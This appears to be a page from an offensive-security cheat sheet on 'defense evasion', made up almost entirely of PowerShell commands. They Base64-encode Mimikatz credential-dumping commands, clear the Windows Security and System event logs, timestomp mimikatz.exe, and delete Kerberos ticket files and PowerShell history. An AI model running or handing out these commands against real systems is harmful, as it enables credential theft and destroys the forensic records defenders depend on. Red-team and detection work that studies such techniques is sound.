Skip to content

๐Ÿฅท Defense Evasion

๐ŸŽญ Obfuscation Methods

# Base64 encode commands
$command = '"privilege::debug" "sekurlsa::logonpasswords"'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)

๐Ÿงน Cleanup

# Clear event logs
wevtutil cl Security
wevtutil cl System

# Timestomp files
$(Get-Item C:\temp\mimikatz.exe).LastWriteTime = $(Get-Date "01/01/2019 12:00:00")

# Remove artifacts
Remove-Item -Path C:\temp\*.kirbi -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath